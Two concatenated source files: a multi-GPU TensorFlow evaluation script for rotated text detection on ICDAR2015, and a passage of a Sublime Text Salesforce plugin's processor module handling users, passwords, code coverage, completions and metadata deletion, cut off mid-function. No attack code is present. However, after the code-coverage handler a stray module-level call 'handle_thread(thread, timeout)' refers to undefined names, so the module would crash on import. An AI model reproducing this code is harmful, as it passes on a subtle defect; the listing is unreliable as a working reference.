test_icdar2015_dcl_ms.py | # -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from libs.networks import build_whole_network_dcl
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, result_queue):
    """Run (multi-scale) rotated-box detection for *images* on one GPU.

    Builds the detection graph once, restores the checkpoint, then for each
    image runs inference at one or more short-side scales, merges the
    per-scale detections with per-class rotated NMS, and pushes a result
    dict (boxes/scores/labels/image_id) onto *result_queue*.
    """
    os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
    # 1. preprocess img
    img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3])  # is RGB. not BGR
    img_batch = tf.cast(img_plac, tf.float32)
    if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
        img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
    else:
        img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
    img_batch = tf.expand_dims(img_batch, axis=0)
    detection_scores, detection_category, detection_boxes_angle = det_net.build_whole_detection_network(
        input_img_batch=img_batch,
        gtboxes_batch_h=None,
        gtboxes_batch_r=None,
        gt_encode_label=None,
        gpu_id=0)
    init_op = tf.group(
        tf.global_variables_initializer(),
        tf.local_variables_initializer()
    )
    restorer, restore_ckpt = det_net.get_restorer()
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    with tf.Session(config=config) as sess:
        sess.run(init_op)
        if not restorer is None:
            restorer.restore(sess, restore_ckpt)
            print('restore model %d ...' % gpu_id)
        for a_img in images:
            raw_img = cv2.imread(a_img)
            raw_h, raw_w = raw_img.shape[0], raw_img.shape[1]
            det_boxes_r_all, det_scores_r_all, det_category_r_all = [], [], []
            # All configured short-side scales are used only when
            # --multi_scale is set; otherwise just the first one.
            # NOTE(review): reads the module-level `args` from parse_args().
            img_short_side_len_list = cfgs.IMG_SHORT_SIDE_LEN if isinstance(cfgs.IMG_SHORT_SIDE_LEN, list) else [
                cfgs.IMG_SHORT_SIDE_LEN]
            img_short_side_len_list = [img_short_side_len_list[0]] if not args.multi_scale else img_short_side_len_list
            for short_size in img_short_side_len_list:
                # Resize keeping aspect ratio, capping the long side.
                max_len = cfgs.IMG_MAX_LENGTH
                if raw_h < raw_w:
                    new_h, new_w = short_size, min(int(short_size * float(raw_w) / raw_h), max_len)
                else:
                    new_h, new_w = min(int(short_size * float(raw_h) / raw_w), max_len), short_size
                img_resize = cv2.resize(raw_img, (new_w, new_h))
                resized_img, detected_boxes, detected_scores, detected_categories = \
                    sess.run(
                        [img_batch, detection_boxes_angle, detection_scores, detection_category],
                        feed_dict={img_plac: img_resize[:, :, ::-1]}  # BGR (cv2) -> RGB
                    )
                # Keep only detections above the visualisation threshold.
                detected_indices = detected_scores >= cfgs.VIS_SCORE
                detected_scores = detected_scores[detected_indices]
                detected_boxes = detected_boxes[detected_indices]
                detected_categories = detected_categories[detected_indices]
                if detected_boxes.shape[0] == 0:
                    continue
                resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
                # Convert rotated boxes to 8-coordinate quads, then rescale
                # the quad coordinates back to the raw image size.
                detected_boxes = forward_convert(detected_boxes, False)
                detected_boxes[:, 0::2] *= (raw_w / resized_w)
                detected_boxes[:, 1::2] *= (raw_h / resized_h)
                # detected_boxes = backward_convert(detected_boxes, False)
                det_boxes_r_all.extend(detected_boxes)
                det_scores_r_all.extend(detected_scores)
                det_category_r_all.extend(detected_categories)
            det_boxes_r_all = np.array(det_boxes_r_all)
            det_scores_r_all = np.array(det_scores_r_all)
            det_category_r_all = np.array(det_category_r_all)
            box_res_rotate_ = []
            label_res_rotate_ = []
            score_res_rotate_ = []
            if det_scores_r_all.shape[0] != 0:
                # Per-class rotated NMS across the merged multi-scale results.
                for sub_class in range(1, cfgs.CLASS_NUM + 1):
                    index = np.where(det_category_r_all == sub_class)[0]
                    if len(index) == 0:
                        continue
                    tmp_boxes_r = det_boxes_r_all[index]
                    tmp_label_r = det_category_r_all[index]
                    tmp_score_r = det_scores_r_all[index]
                    tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
                    try:
                        inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
                                                        scores=np.array(tmp_score_r),
                                                        iou_threshold=cfgs.NMS_IOU_THRESHOLD,
                                                        max_output_size=5000)
                    except:
                        # Fallback: GPU rotated NMS on [boxes|score] rows.
                        tmp_boxes_r_ = np.array(tmp_boxes_r_)
                        tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
                        tmp[:, 0:-1] = tmp_boxes_r_
                        tmp[:, -1] = np.array(tmp_score_r)
                        # Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
                        jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
                        jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
                        inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
                                             float(cfgs.NMS_IOU_THRESHOLD), 0)
                    box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
                    score_res_rotate_.extend(np.array(tmp_score_r)[inx])
                    label_res_rotate_.extend(np.array(tmp_label_r)[inx])
            box_res_rotate_ = np.array(box_res_rotate_)
            score_res_rotate_ = np.array(score_res_rotate_)
            label_res_rotate_ = np.array(label_res_rotate_)
            result_dict = {'scales': [1, 1], 'boxes': box_res_rotate_,
                           'scores': score_res_rotate_, 'labels': label_res_rotate_,
                           'image_id': a_img}
            result_queue.put_nowait(result_dict)
def test_icdar2015(det_net, real_test_img_list, gpu_ids, show_box, txt_name):
    """Fan the test images out over the given GPUs and collect results.

    Spawns one worker process per GPU id, each handling a contiguous slice
    of *real_test_img_list*, then drains the shared result queue.  Each
    result is either drawn onto the image (*show_box*) or written as an
    ICDAR-format ``res_<name>.txt`` submission file; processed image names
    are appended to *txt_name* to support resuming.
    """
    save_path = os.path.join('./test_icdar2015', cfgs.VERSION)
    tools.mkdir(save_path)
    nr_records = len(real_test_img_list)
    pbar = tqdm(total=nr_records)
    gpu_num = len(gpu_ids.strip().split(','))
    nr_image = math.ceil(nr_records / gpu_num)
    result_queue = Queue(500)
    procs = []
    for i, gpu_id in enumerate(gpu_ids.strip().split(',')):
        # Each process gets a contiguous slice of the image list.
        start = i * nr_image
        end = min(start + nr_image, nr_records)
        split_records = real_test_img_list[start:end]
        proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, result_queue))
        print('process:%d, start:%d, end:%d' % (i, start, end))
        proc.start()
        procs.append(proc)
    for i in range(nr_records):
        res = result_queue.get()
        if res['boxes'].shape[0] == 0:
            # No detections: still emit an empty submission file and log
            # the image as processed so resume logic skips it.
            fw_txt_dt = open(os.path.join(save_path, 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])),
                             'w')
            fw_txt_dt.close()
            pbar.update(1)
            fw = open(txt_name, 'a+')
            fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
            fw.close()
            continue
        # Unpack the 8 quad coordinates and rescale by the reported scales.
        x1, y1, x2, y2, x3, y3, x4, y4 = res['boxes'][:, 0], res['boxes'][:, 1], res['boxes'][:, 2], res['boxes'][:, 3],\
                                         res['boxes'][:, 4], res['boxes'][:, 5], res['boxes'][:, 6], res['boxes'][:, 7]
        x1, y1 = x1 * res['scales'][0], y1 * res['scales'][1]
        x2, y2 = x2 * res['scales'][0], y2 * res['scales'][1]
        x3, y3 = x3 * res['scales'][0], y3 * res['scales'][1]
        x4, y4 = x4 * res['scales'][0], y4 * res['scales'][1]
        boxes = np.transpose(np.stack([x1, y1, x2, y2, x3, y3, x4, y4]))
        if show_box:
            # Visualisation mode: draw boxes on the image and save it.
            boxes = backward_convert(boxes, False)
            nake_name = res['image_id'].split('/')[-1]
            draw_path = os.path.join(save_path, nake_name)
            draw_img = np.array(cv2.imread(res['image_id']), np.float32)
            final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
                                                                                boxes=boxes,
                                                                                labels=res['labels'],
                                                                                scores=res['scores'],
                                                                                method=1,
                                                                                in_graph=False)
            cv2.imwrite(draw_path, final_detections)
        else:
            # Submission mode: one comma-separated quad per line.
            fw_txt_dt = open(os.path.join(save_path, 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])), 'w')
            for box in boxes:
                line = '%d,%d,%d,%d,%d,%d,%d,%d\n' % (box[0], box[1], box[2], box[3],
                                                      box[4], box[5], box[6], box[7])
                fw_txt_dt.write(line)
            fw_txt_dt.close()
            fw = open(txt_name, 'a+')
            fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
            fw.close()
        pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
        pbar.update(1)
    for p in procs:
        p.join()
def eval(num_imgs, test_dir, gpu_ids, show_box):
    """Run ICDAR2015 evaluation over the images in *test_dir*.

    :param num_imgs: number of images to test, or np.inf for all
    :param test_dir: directory containing the test images
    :param gpu_ids: comma-separated GPU id string, e.g. "0,1"
    :param show_box: draw boxes instead of writing submission files
    """
    txt_name = '{}.txt'.format(cfgs.VERSION)
    if not show_box:
        # Resume support: txt_name records already-tested image names.
        # Fix: use the `test_dir`/`show_box` parameters consistently
        # instead of reaching for the module-level `args`.
        if not os.path.exists(txt_name):
            with open(txt_name, 'w'):
                pass
        # Fix: close file handles deterministically with `with`.
        with open(txt_name, 'r') as fr:
            img_filter = fr.readlines()
        print('****************************' * 3)
        print('Already tested imgs:', img_filter)
        print('****************************' * 3)
        test_imgname_list = [os.path.join(test_dir, img_name) for img_name in os.listdir(test_dir)
                             if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
                             (img_name + '\n' not in img_filter)]
    else:
        test_imgname_list = [os.path.join(test_dir, img_name) for img_name in os.listdir(test_dir)
                             if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
    assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
                                        ' Note that, we only support img format of (.jpg, .png, and .tiff) '
    if num_imgs == np.inf:
        real_test_img_list = test_imgname_list
    else:
        real_test_img_list = test_imgname_list[: num_imgs]
    dcl = build_whole_network_dcl.DetectionNetwork(base_network_name=cfgs.NET_NAME,
                                                   is_training=False)
    test_icdar2015(det_net=dcl, real_test_img_list=real_test_img_list, gpu_ids=gpu_ids, show_box=show_box, txt_name=txt_name)
    if not show_box:
        # Clean up the resume file after a full successful run.
        os.remove(txt_name)
def parse_args():
    """Parse command-line options for the ICDAR2015 evaluation script."""
    parser = argparse.ArgumentParser('evaluate the result with Pascal2007 strand')
    parser.add_argument('--test_dir', dest='test_dir', type=str,
                        default='/data/yangxue/dataset/ICDAR2015/ch4_test_images',
                        help='evaluate imgs dir ')
    parser.add_argument('--gpus', dest='gpus', type=str,
                        default='0,1,2,3,4,5,6,7',
                        help='gpu id')
    parser.add_argument('--eval_num', dest='eval_num', type=int,
                        default=np.inf,
                        help='the num of eval imgs')
    parser.add_argument('--show_box', '-s', default=False,
                        action='store_true')
    parser.add_argument('--multi_scale', '-ms', default=False,
                        action='store_true')
    return parser.parse_args()
if __name__ == '__main__':
    args = parse_args()
    banner = 20 * "--"
    print(banner)
    print(args)
    print(banner)
    eval(args.eval_num,
         test_dir=args.test_dir,
         gpu_ids=args.gpus,
         show_box=args.show_box)
|
processor.py | import sublime
import sublime_plugin
import os
import xml
import urllib
import json
import threading
import time
import pprint
import urllib.parse
import shutil
import datetime
import math
from xml.sax.saxutils import unescape
from . import requests, context, util
from .context import COMPONENT_METADATA_SETTINGS
from .salesforce import soap, message
from .salesforce.api.bulk import BulkJob
from .salesforce.api.bulk import BulkApi
from .salesforce.api.metadata import MetadataApi
from .salesforce.api.tooling import ToolingApi
from .salesforce.api.apex import ApexApi
from .salesforce.lib.panel import Printer
from .progress import ThreadProgress, ThreadsProgress
from .salesforce.lib import diff
def handle_populate_users(callback_command, timeout=120):
    """Return the cached active-user map, or build it asynchronously.

    If ``<workspace>/.config/users.json`` exists, its parsed content is
    returned directly.  Otherwise a SOQL query for all active users is run
    in a background thread; when it finishes the result is cached via
    ``util.add_config_history`` and *callback_command* is re-run (this call
    then returns None).

    :param callback_command: sublime command to run once the cache is built
    :param timeout: polling interval in milliseconds for the async check
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return
        # Fix: was `api.result or api.result["success"]`, which crashed on
        # a falsy result and proceeded on a failed one; siblings use `and`.
        if api.result and api.result["success"]:
            records = api.result["records"]
            users = {}
            for record in records:
                if not record["FirstName"]:
                    name = "%s => %s" % (record["LastName"], record["Username"])
                else:
                    name = "%s => %s" % (
                        "%s %s" % (record["LastName"], record["FirstName"]),
                        record["Username"]
                    )
                users[name] = record["Id"]
            util.add_config_history("users", users, settings)
            sublime.active_window().run_command(callback_command)
    # If users cache exists in `/.config/users.json`, just return it
    settings = context.get_settings()
    user_cache = os.path.join(settings["workspace"], ".config", "users.json")
    if os.path.isfile(user_cache):
        # Fix: close the cache file deterministically (was a bare open()).
        with open(user_cache) as fp:
            return json.loads(fp.read())
    # If not exist, we need to use callback function
    api = ToolingApi(settings)
    query = "SELECT Id, FirstName, LastName, Username FROM User WHERE IsActive = true"
    thread = threading.Thread(target=api.query_all, args=(query,))
    thread.start()
    handle_thread(thread, timeout)
    ThreadProgress(api, thread, "Downloading Users List", "Succeed to download users list")
def populate_sobject_recordtypes():
    """
    Get dict ([sobject, recordtype name] => recordtype id) in whole org

    @return: {
        "<SobjectType>, <RecordType Name>": "<RecordType Id>",
        ...
    } or None when the query fails
    """
    # Get settings
    settings = context.get_settings()
    # If sobjects is exist in `/.config/recordtype.json`, just return it
    recordtype_path = settings["workspace"] + "/.config/recordtype.json"
    if os.path.isfile(recordtype_path):
        # Fix: close the cache file deterministically (was a bare open()).
        with open(recordtype_path) as fp:
            return json.loads(fp.read())
    # If sobjects is not exist in globals(), post request to pouplate it
    api = ToolingApi(settings)
    query = "SELECT Id, Name, SobjectType FROM RecordType"
    thread = threading.Thread(target=api.query_all, args=(query,))
    thread.start()
    # Block until the query thread has produced a result
    while thread.is_alive() or not api.result:
        time.sleep(1)
    # Exception Process
    if not api.result["success"]:
        Printer.get('error').write(message.SEPRATE.format(util.format_error_message(api.result)))
        return
    records = api.result["records"]
    sobject_recordtypes = {}
    for recordtype in records:
        sobject_type = recordtype["SobjectType"]
        recordtype_name = recordtype["Name"]
        recordtype_id = recordtype["Id"]
        sobject_recordtypes[sobject_type + ", " + recordtype_name] = recordtype_id
    # Add Master record type of every layoutable sobject
    # (Master always has the fixed Id 012000000000000AAA)
    sobjects_describe = util.populate_sobjects_describe()
    for sobject_type in sobjects_describe:
        sobject_describe = sobjects_describe[sobject_type]
        if not sobject_describe["layoutable"]: continue
        sobject_recordtypes[sobject_type + ", Master"] = "012000000000000AAA"
    util.add_config_history("recordtype", sobject_recordtypes, settings)
    return sobject_recordtypes
def handle_update_user_language(language, timeout=120):
    """Update the logged-in user's LanguageLocaleKey via an async PATCH."""
    settings = context.get_settings()
    api = ToolingApi(settings)
    session = util.get_session_info(settings)
    if not session:
        return Printer.get('error').write("Login is required before this action")
    url = "/sobjects/User/%s" % session["user_id"]
    payload = {"LanguageLocaleKey": language}
    patch_thread = threading.Thread(target=api.patch, args=(url, payload,))
    patch_thread.start()
    progress_msg = "Updating User Language to " + language
    done_msg = "User language is updated to " + language
    ThreadProgress(api, patch_thread, progress_msg, done_msg)
def handle_enable_development_mode(user_id, timeout=120):
    """Turn on ApexPages development mode for *user_id* via an async PATCH."""
    settings = context.get_settings()
    api = ToolingApi(settings)
    url = "/sobjects/User/%s" % user_id
    payload = {"UserPreferencesApexPagesDeveloperMode": True}
    patch_thread = threading.Thread(target=api.patch, args=(url, payload,))
    patch_thread.start()
    ThreadProgress(api, patch_thread, "Enabling User Development Mode",
                   "Succeed to Enabling User Development Mode")
def handle_update_user_password(user_id, new_password, timeout=120):
    """Set a new password for *user_id* via a background API call.

    The password shown in the progress message is masked: only the first
    three characters stay visible.
    """
    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.manage_password, args=(
        user_id, {"NewPassword": new_password},
    ))
    thread.start()
    # Fix: the visible prefix and the star count disagreed
    # ([:5] visible but stars counted from [3:]); mask past the first 3.
    masked_password = new_password[:3] + "*" * len(new_password[3:])
    ThreadProgress(api, thread, "Updating User Password to " + masked_password,
                   "Succeed to update user password to " + masked_password)
def handle_login_thread(callback_options=None, force=False, timeout=120):
    """Login to the default Salesforce org, then run an optional callback.

    :param callback_options: optional dict {"callback_command": str, "args": dict}
    :param force: force a fresh login instead of reusing the cached session
    :param timeout: polling interval in milliseconds for the async check
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return
        result = api.result
        if result and result["success"]:
            if "callback_command" in callback_options:
                callback_command = callback_options["callback_command"]
                args = callback_options["args"] if "args" in callback_options else {}
                sublime.active_window().run_command(callback_command, args)
    # Fix: mutable default argument ({}) was shared across calls.
    if callback_options is None:
        callback_options = {}
    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.login, args=(force,))
    thread.start()
    handle_thread(thread, timeout)
    default_project_name = settings["default_project_name"]
    ThreadProgress(api, thread, "Login to %s" % default_project_name,
                   default_project_name + " Login Succeed")
def handle_view_code_coverage(component_name, component_id, body, timeout=120):
    """Show the code coverage of an Apex class/trigger in a new view.

    Queries ApexCodeCoverageAggregate for *component_id*, opens *body* in a
    new view titled with the coverage percentage, and underlines every
    uncovered line.

    :param component_name: display name of the class/trigger
    :param component_id: Id of the ApexClass or ApexTrigger record
    :param body: source code to display in the new view
    :param timeout: polling interval in milliseconds for the async check
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return
        result = api.result
        if not result["success"]:
            return
        if result["totalSize"] == 0:
            Printer.get("log").write("There is no available code coverage")
            return
        # Populate the coverage info from server
        uncovered_lines = result["records"][0]["Coverage"]["uncoveredLines"]
        covered_lines = result["records"][0]["Coverage"]["coveredLines"]
        covered_lines_count = len(covered_lines)
        uncovered_lines_count = len(uncovered_lines)
        total_lines_count = covered_lines_count + uncovered_lines_count
        if total_lines_count == 0:
            Printer.get("log").write("There is no available code coverage")
            return
        coverage_percent = covered_lines_count / total_lines_count * 100
        # Append coverage statistic info
        coverage_statistic = "%s Coverage: %.2f%%(%s/%s)" % (
            component_name, coverage_percent,
            covered_lines_count, total_lines_count
        )
        # If has coverage, just add coverage info to new view
        view = sublime.active_window().new_file()
        view.run_command("new_view", {
            "name": coverage_statistic,
            "input": body
        })
        # Calculate line coverage: collect a region per uncovered line
        split_lines = view.lines(sublime.Region(0, view.size()))
        uncovered_region = []
        for region in split_lines:
            # The first four Lines are the coverage info
            line = view.rowcol(region.begin() + 1)[0] + 1
            if line in uncovered_lines:
                uncovered_region.append(region)
        # Underline every uncovered line in the new view
        view.add_regions("uncovered_lines", uncovered_region, "invalid", "dot",
                         sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
    settings = context.get_settings()
    api = ToolingApi(settings)
    query = "SELECT Coverage FROM ApexCodeCoverageAggregate " + \
            "WHERE ApexClassOrTriggerId = '{0}'".format(component_id)
    thread = threading.Thread(target=api.query, args=(query, True,))
    thread.start()
    ThreadProgress(api, thread, "View Code Coverage of " + component_name,
                   "View Code Coverage of " + component_name + " Succeed")
    handle_thread(thread, timeout)
handle_thread(thread, timeout)
def handle_refresh_folder(types, ignore_package_xml=True, timeout=120):
    """Retrieve the given metadata *types* and extract them into the workspace.

    :param types: metadata types payload passed to MetadataApi.retrieve
    :param ignore_package_xml: when True, do not overwrite the local package.xml
    :param timeout: polling interval in milliseconds for the async check
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return
        # Not succeed
        if not api.result or not api.result["success"]: return
        # Get refresh result
        result = api.result
        # Populate extract_to directory
        extract_to = settings["workspace"]
        # Extract zip, True means not override package.xml
        thread = threading.Thread(target=util.extract_encoded_zipfile,
                                  args=(result["zipFile"], extract_to, ignore_package_xml,))
        thread.start()
        util.reload_file_attributes(result["fileProperties"], settings)
        # Hide panel 0.5 seconds later
        sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
    # Start to request
    settings = context.get_settings()
    api = MetadataApi(settings)
    thread = threading.Thread(target=api.retrieve, args=({"types": types},))
    thread.start()
    handle_thread(thread, timeout)
    # Fix: renamed from `message`, which shadowed the imported
    # `.salesforce.message` module within this function.
    progress_message = "Refresh Folder"
    ThreadProgress(api, thread, progress_message, progress_message + " Succeed")
def handle_reload_symbol_tables(timeout=120):
    """
    Reload Symbol Tables to Local Cache

    Queries the org's Apex symbol tables in a background thread and stores
    the parsed completion data per-username in
    ``symbol_table.sublime-settings``.

    :param timeout: polling interval in milliseconds for the async check
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return
        result = api.result
        if not result["success"]: return
        # Get the username of default project
        username = settings["username"]
        # Save symbolTable to component_metadata.sublime-settings
        symbol_table_cache = sublime.load_settings("symbol_table.sublime-settings")
        symboltable_dict = symbol_table_cache.get(username, {})
        for record in result["records"]:
            # Sometimes symbolTable is null, just skip
            if not record["SymbolTable"]: continue
            # Outer completions
            outer = util.parse_symbol_table(record["SymbolTable"])
            symboltable_dict[record["Name"].lower()] = {
                "outer": outer,
                "name": record["Name"]
            }
            # Inner completions: one entry per inner class, keyed by
            # its lowercased name
            inners = {}
            for inn in record["SymbolTable"]["innerClasses"]:
                inner = util.parse_symbol_table(inn)
                inners[inn["name"].lower()] = inner
            symboltable_dict[record["Name"].lower()]["inners"] = inners
        symbol_table_cache.set(settings["username"], symboltable_dict)
        sublime.save_settings("symbol_table.sublime-settings")
    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.query_symbol_table, args=(30,))
    thread.start()
    wating_message = "Reloading Symbol Tables"
    ThreadProgress(api, thread, wating_message, wating_message + " Succeed")
    handle_thread(thread, timeout)
def handle_reload_sobjects_completions(timeout=120):
    """
    Save sobject describe to local which is used in completions

    Flow: one Global Describe call lists every sobject; the list is then
    chunked and described in parallel threads; finally the combined field,
    picklist, and relationship data is written per-username into
    ``sobjects_completion.sublime-settings`` and the in-memory completion
    cache is reloaded.

    :param timeout: polling interval in milliseconds for the async checks
    """
    def handle_threads(apis, threads, timeout):
        # Wait until every per-chunk describe thread has finished.
        for thread in threads:
            if thread.is_alive():
                sublime.set_timeout(lambda: handle_threads(apis, threads, timeout), timeout)
                return
        # If succeed, get the all sobject describe result
        results = []
        for api in apis:
            results.extend(api.result)
        # Save all sobject describe result to sublime settings
        s = sublime.load_settings("sobjects_completion.sublime-settings")
        sobjects_completion = {"sobjects": {}}
        all_parent_relationship_dict = {}
        all_child_relationship_dict = {}
        for sobject_describe in results:
            # Initiate Sobject completions
            if "name" not in sobject_describe:
                continue
            sobject_name = sobject_describe["name"]
            # If sobject is excluded sobject, just continue
            sobject_name = sobject_name.lower()
            sobjects_completion["sobjects"][sobject_name] = {
                "name": sobject_describe["name"],
                "keyPrefix": sobject_describe["keyPrefix"],
                "layoutable": sobject_describe["layoutable"],
                "triggerable": sobject_describe["triggerable"]
            }
            # Combine Fields dict, Picklist Field dict and parent relationship dict
            fields_dict = {}
            picklist_field_dict = {}
            parent_relationship_dict = {}
            child_relationship_dict = {}
            for f in sobject_describe["fields"]:
                field_name = f["name"]
                precision = f["precision"]
                scale = f["scale"]
                field_type = f["type"]
                referenceTo = f["referenceTo"] if "referenceTo" in f else []
                # Build a human-readable type description per field type;
                # formula fields get a Formula(...) wrapper.
                if f["calculatedFormula"]:
                    capitalize_field = field_type.capitalize()
                    field_desc_dict = {
                        "double": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
                        "currency": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
                        "date": "Formula(Date)",
                        "datetime": "Formula(Datetime)",
                        "boolean": "Formula(Boolean)",
                        "int": "Formula(Integer)",
                        "reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
                        "other": "Formula(%s, %s)" % (capitalize_field, f["length"])
                    }
                else:
                    field_desc_dict = {
                        "double": "Double(%s, %s)" % (precision, scale),
                        "currency": "Currency(%s, %s)" % (precision, scale),
                        "date": "Date",
                        "datetime": "Datetime",
                        "boolean": "Boolean",
                        "reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
                        "int": "Integer",
                        "other": "%s(%s)" % (field_type.capitalize(), f["length"])
                    }
                # External Or not: [E]xternalId, [U]nique, [R]equired markers
                externalUniqueNotation = ""
                if f["externalId"] or f["unique"]:
                    externalUniqueNotation = "[%s%s%s] " % (
                        "E" if f["externalId"] else "",
                        "U" if f["unique"] else "",
                        "R" if not f["nillable"] else ""
                    )
                # If display_field_name_and_label setting is true,
                # display both field name and field label
                field_name_desc = "%s(%s)" % (field_name, f["label"]) \
                    if settings["display_field_name_and_label"] else field_name
                # Display field type with specified format
                field_type_desc = field_desc_dict[field_type] if field_type \
                    in field_desc_dict else field_desc_dict["other"]
                fd = "%s%s\t%s" % (externalUniqueNotation, field_name_desc, field_type_desc)
                fields_dict[fd] = field_name
                # Picklist Dcit
                if f["type"] == "picklist":
                    picklists = []
                    for picklistValue in f["picklistValues"]:
                        picklists.append({
                            "label": picklistValue["label"],
                            "value": picklistValue["value"]
                        })
                    picklist_field_dict[field_name] = picklists
                # List all Reference Field Relationship Name as fields
                # Some fields has two more references, we can't list the fields of it
                if not len(f["referenceTo"]) == 1: continue
                parentRelationshipName = f["relationshipName"]
                if not parentRelationshipName: continue
                parentSobject = f["referenceTo"][0]
                # Record the relationship globally, de-duplicating targets
                if parentRelationshipName in all_parent_relationship_dict:
                    is_duplicate = False
                    for so in all_parent_relationship_dict[parentRelationshipName]:
                        if parentSobject == so:
                            is_duplicate = True
                            break
                    if not is_duplicate:
                        all_parent_relationship_dict[parentRelationshipName].append(parentSobject)
                else:
                    all_parent_relationship_dict[parentRelationshipName] = [parentSobject]
                # Add Parent Relationship Name
                parent_relationship_dict[f["relationshipName"]] = parentSobject
            # Child Relationship dict
            for f in sobject_describe["childRelationships"]:
                childRelationshipName = f["relationshipName"]
                childSobject = f["childSObject"]
                if not childRelationshipName: continue
                # Add Parent Relationship Name as Field
                child_relationship_dict[childRelationshipName] = childSobject
            # Combine sobject fields dict and sobject child relationship dict
            sobjects_completion["sobjects"][sobject_name]["fields"] = fields_dict
            sobjects_completion["sobjects"][sobject_name]["picklist_fields"] = picklist_field_dict
            sobjects_completion["sobjects"][sobject_name]["parentRelationships"] = parent_relationship_dict
            sobjects_completion["sobjects"][sobject_name]["childRelationships"] = child_relationship_dict
        # Populate Child Relationship and Parent Relationship
        sobjects_completion["parentRelationships"] = all_parent_relationship_dict
        # sobjects_completion["childRelationships"] = all_child_relationship_dict
        # Every project has unique username
        username = settings["username"]
        s.set(username, sobjects_completion)
        # Save settings
        sublime.save_settings("sobjects_completion.sublime-settings")
        # Reload cache for completions
        from . import completions
        sublime.set_timeout(lambda: completions.load_sobject_cache(
            True, username
        ), 5)
    def handle_thread(api, thread, timeout=120):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(api, thread, timeout), timeout)
            return
        # Exception Process
        if not api.result or not api.result["success"]:
            return
        # Get describe result of all sObjects
        sobjects_describe = api.result["sobjects"]
        sobjects = list(sobjects_describe.keys())
        # Split the sobject list into one chunk per allowed connection
        mcc = settings["maximum_concurrent_connections"]
        chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
        threads = []
        apis = []
        for sobjects in chunked_sobjects:
            sobjects = [
                {"name": so, "tooling": sobjects_describe[so]["tooling"]}
                for so in sobjects
            ]
            api = ToolingApi(settings)
            thread = threading.Thread(target=api.describe_sobjects, args=(sobjects,))
            thread.start()
            threads.append(thread)
            apis.append(api)
        ThreadsProgress(threads, "Download Cache of Sobjects", "Download Cache of Sobjects Succeed")
        handle_threads(apis, threads, 10)
    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.get_sobjects, args=())
    thread.start()
    ThreadProgress(api, thread, "Global Describe", "Global Describe Succeed")
    handle_thread(api, thread, timeout)
def handle_destructive_files(dirs_or_files, ignore_folder=True, timeout=120):
    """
    Destruct File(s) from Salesforce org and remove from local disk via Metadata API

    @param dirs_or_files: lightning direcotry(bundle) or files
    @param ignore_folder: ignore the folder itself
    @param timeout: polling interval in milliseconds for the async check
    @return: None
    """
    def handle_destruct_thread(thread, timeout=120):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_destruct_thread(thread, timeout), timeout)
            return
        # After succeed, remove dirs_or_files and related *-meta.xml from local
        if "body" in api.result and api.result["body"]["status"] == "Succeeded":
            # Remove Component metadata cache
            util.delete_component_attribute(dirs_or_files)
            # Remove file from local disk and close the related view
            win = sublime.active_window()
            for _file_or_dir in dirs_or_files:
                view = util.get_view_by_file_name(_file_or_dir)
                if view:
                    win.focus_view(view)
